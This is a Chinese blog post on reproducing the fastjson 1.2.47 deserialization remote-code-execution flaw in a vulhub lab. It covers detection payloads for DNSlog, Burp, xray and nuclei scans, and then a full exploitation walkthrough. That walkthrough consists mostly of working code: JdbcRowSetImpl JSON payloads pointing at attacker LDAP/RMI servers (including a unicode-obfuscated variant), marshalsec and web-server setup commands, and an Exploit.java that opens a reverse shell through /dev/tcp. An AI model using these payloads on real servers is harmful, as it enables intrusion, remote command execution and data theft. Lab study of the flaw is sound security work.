fastjson反序列化漏洞(1.2.47-rce)

已于 2024-01-20 22:19:04 修改
阅读量781 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: fastjson 反序列化 复现
于 2023-10-18 11:32:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/133900872
版权

漏洞介绍

FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。

指纹识别

centos7(vps)+vulhub

在腾讯云vps上搭建了vulhub,利用这个vulhub起一个1.2.47-rce环境。
在这里插入图片描述
可以看到页面用的json格式,这里推荐两种识别方式。

A.抓包改为POST方式,花括号不闭合,返回包就会出现fastjson字样,不过这个可以屏蔽,就用其他办法
 
B.利用dnslog盲打
1.	利用java.net.Inet[4|6]Address
{"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"}
2.	利用java.net.InetSocketAddress
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
3.	利用java.net.URL
{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}
4.	其他变形
{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://dnslog”}}""} Set[{"@type":"java.net.URL","val":"http://dnslog"}] Set[{"@type":"java.net.URL","val":"http://dnslog"} {{"@type":"java.net.URL","val":"http://dnslog"}:0

1.2.67版本前
{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}

1.2.67版本后payload
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

一、报错回显

故意构造不完整json请求,返回的数据包会进行报错,出现fastjson关键字
在这里插入图片描述
或者
在这里插入图片描述
如果是配置了不返回报错信息怎么办?那这种情况就只有利用dnslog盲打了。

二、dnslog

这里有个小技巧就是,如果你批量检查或者自己的dnslog,里面有很多记录。你可以这样使用’baidu’.d1flzs.dnslog.cn,在dnslog前面加个名称

盲打payload:
1.2.67版本前

{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}

1.2.67版本后payload

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

在这里插入图片描述
在这里插入图片描述

漏洞探测

burp插件

FastjsonScan(主动)

插件参考地址:https://blog.csdn.net/m0_60571842/article/details/133851305
以外网vps靶场为例(1.2.47-rce)
在这里插入图片描述
post请求数据包发送给插件扫描
在这里插入图片描述
可以把dataSourceName值替换为dnslog地址
在这里插入图片描述
在这里插入图片描述

BurpFastJsonScan(被动)推荐

插件参考地址:https://blog.csdn.net/m0_60571842/article/details/132470303

注:在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

该插件会对BurpSuite传进来的带有json数据的请求包进行检测

重新抓取请求包,把GET方式改为POST方式放行即可
在这里插入图片描述
在这里插入图片描述
同样也可以把ldap://ar9hqc2kd0lov04.1tt0y7.dnslog.cn/miao1改为自己的dnslog地址
在这里插入图片描述
在这里插入图片描述

xray

xray.exe webscan --plug fastjson --url http://ip:8090/

在这里插入图片描述

nuclei

./nuclei -u http://114.132.219.55:8090/ -s medium,high,critical  -o 666.txt

在这里插入图片描述

漏洞利用

1、方式一

github项目地址:https://github.com/firstC99/fastjson-1.2.47-RCE

一、修改Exploit并编译成class文件

修改Exploit.java中的反弹IP和端口(准备接收反弹SHELL的服务器IP和监听端口)

使用javac编译Exploit.java,生成Exploit.class文件(注意:javac版本最好与目标服务器接近,否则目标服务器无法解析class文件,会报错)

javac Exploit.java

在这里插入图片描述
在这里插入图片描述
然后把整个文件夹上传到VPS上
在这里插入图片描述

二、准备LDAP服务和Web服务

将marshalsec-0.0.3-SNAPSHOT-all.jar文件和Exploit.java放在同一目录下

在当前目录下运行LDAP服务,修改IP为当前这台服务器的IP

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP/#Exploit 端口

加上端口就是指定端口,不然就默认为1389
在当前目录下运行Web服务

python3 -m http.server 80 或者 python -m SimpleHTTPServer 80

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

三、发送payload

在漏洞页面bp抓包后post提交数据
修改ip为正在运行LDAP和Web服务的服务器IP

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}

在这里插入图片描述
或者
不是有两个BP插件都探测出来有漏洞吗,而且都给了对应的POC,直接使用插件给的POC去打不就行了吗

BurpFastJsonScan(被动)推荐

给出的POC是

{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://ar9hqc2kd0lov04.1tt0y7.dnslog.cn/miao1","autoCommit":true}}

在这里插入图片描述

FastjsonScan(主动)

给出的POC是

{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://pvofb9gahutpp5e4t0tu8aoip9vzjo.oastify.com/aaa","autoCommit":true}}

在这里插入图片描述
在这里插入图片描述

接下来如果没有任何报错的话,LDAP将会把请求Redirect到Web服务,Fastjson将会下载Exploit.class,并解析运行
你的LDAP服务和Web服务都会收到请求记录,如果没有问题,你的nc也会收到反弹回来的SHELL
在这里插入图片描述

发送payload的时候,ldap服务那也会有明显提示,如果什么提示都没有就说明这个payload有问题
在这里插入图片描述

2、方式二

方式二跟方式一都大同小异,只不过是calss.java的内容不同而已

一、在vps上创建一个Exploit.java文件

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

然后编译Exploit.java,会生成一个Exploit.class文件
javac Exploit.java

二、准备LDAP服务和Web服务

将marshalsec-0.0.3-SNAPSHOT-all.jar文件和Exploit.java放在同一目录下

在当前目录下运行LDAP服务,修改IP为当前这台服务器的IP

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP/#Exploit 端口

加上端口就是指定端口,不然就默认为1389
在当前目录下运行Web服务

python3 -m http.server 80 或者 python -m SimpleHTTPServer 80

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

三、发送payload

访问fastjson页面Burp发包,改为POST请求,使用Payload

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://x.x.x.x:9999/Exploit",
        "autoCommit":true
    }
 
}

或者

{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://114.132.219.55:9999/miao1","autoCommit":true}}

反弹shell的样子是这样的
在这里插入图片描述

Fastjson1.2.47反序列化漏洞
weixin_51151498的博客
01-05 1148
Fastjson1.2.47反序列化漏洞
fastjson<=1.2.47反序列化漏洞复现
DaWan
09-29 488
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
fastjson反序列化漏洞fastjson-1.2.47
zyer
04-28 4279
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
关于 Jackson 新的反序列化漏洞,从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
03-15 992
不必惊慌,pig4cloud[1] 默认没开启动态类型,并且 spring cache[2] 没有使用 jackson 序列化。如果你的 redis 采用的 jackson 序列化,并且是注入的全局的 ObjectMapper 请注意,请采用类似 mica-redis[3] 这样的 copy,来避免对全局的 ObjectMapper 污染导致不安全。后面我们会翻译两篇 Jackson 作者文章,让大家深入了解一下 Jackson 动态类型和安全机制。
Fastjson<=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 994
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化成Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
漏洞库】Fastjson_1.2.47_rce
yuan_boss的博客
09-08 1363
我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6602
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
FastJson反序列化漏洞Fastjson1.2.47
jxy158212的博客
02-24 841
Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)它采用一种“假定有序快速匹配”的算法,把 JSON Parse 的性能提升到极致,是目前 Java 语言中最快的 JSON 库,并且它不依赖于其它任何库。Fastjson已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。
Fastjson反序列化漏洞
wutiangui的博客
09-08 498
使用AutoType功能进行序列化的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。2、存在漏洞的靶机对json反序列化时候,会加载执行我们构造的恶意信息(访问rmi服务器),靶机服务器就会向rmi服务器请求待执行的命令。
Fastjson反序列化漏洞复现
aa1281047341的博客
08-21 188
Fastjson-1.2.47-rce-反序列化漏洞复现
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3553
Fastjson 1.2.47反序列化漏洞复现
(环境搭建+复现Fastjson1.2.47版本反序列化漏洞复现
热门推荐
daxi0ng的博客
11-13 1万+
0x00 简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 0x01 漏洞概述 Fastjson1.2.47反序列化漏洞 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型...
fastjson_1.2.47rce漏洞复现
weixin_71090536的博客
01-23 2316
Fastjson是一个 Java 语言编写的高性能 JSON 解析器和生成器
漏洞复现 Fastjson 1.2.47-rce
Lucky1youzi的博客
01-05 1090
用burp得扩展插件FastjsonScan来进行检测,将拦截得包右击鼠标发送Extensions/FastjsonScan ,如果扫描的目标存在漏洞,在窗口下面的Request窗口会展示使用的payload,如果没有漏洞,则会展示原始的请求与响应。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。构造反弹shell,进行base64编码,推荐在线工具,可以快速做bash反弹shell命令。
fastjson1.2.47RCE漏洞复现
Mrs_H的博客
10-04 2059
Fastjson1.2.47RCE漏洞复现 前言 我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发现这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境复现这个FastjsonRCE漏洞。也就有了这篇文章。 环境准备 为了方便起见,我这次直接选择了vulhub的docker环境,有两种方式可以去获得项目源码 一种是直接在github上down下来 https:/
FastjsonRCE1.2.47漏洞复现
02-24 2426
Fastjson漏洞原理和RCE1.2.47漏洞复现
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2903
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
Java代码审计——Fastjson1.2.47反序列化漏洞
王嘟嘟的博客
02-11 498
在进行整理的时候突然看到Fastjson1.2.47漏洞没有整理,所以这里重新整理。
漏洞复现Fastjson_1.2.47_rce
过期的秋刀鱼
11-04 1015
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。后可向其POST新的JSON对象,后端会利用fastjson进行解析。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。构造反弹shell,进行base64编码。将content-type修改为。即可看到一个json对象被返回。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值